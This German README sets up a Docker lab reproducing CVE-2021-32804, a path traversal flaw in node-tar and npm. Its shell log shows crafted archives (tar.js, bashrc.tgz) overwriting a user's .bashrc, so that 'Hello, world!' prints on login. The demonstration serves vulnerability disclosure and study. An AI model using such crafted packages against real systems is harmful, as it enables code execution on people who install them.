
Dieses Repository dient zum Aufbau der Docker-Umgebung, die im yamory-Blog „CVE-2021-32804 – Path-Traversal-Schwachstelle in node-tar, die auch npm betrifft" verwendet wurde.
docker build -t cve-2021-32804 .
docker run -it cve-2021-32804 /bin/bash
root@5e1af2148215:/poc# node tar.js
root@5e1af2148215:/poc# su node
Hello, world!
root@5e1af2148215:/poc# npm i bashrc.tgz
root@5e1af2148215:/poc# su node
Hello, world!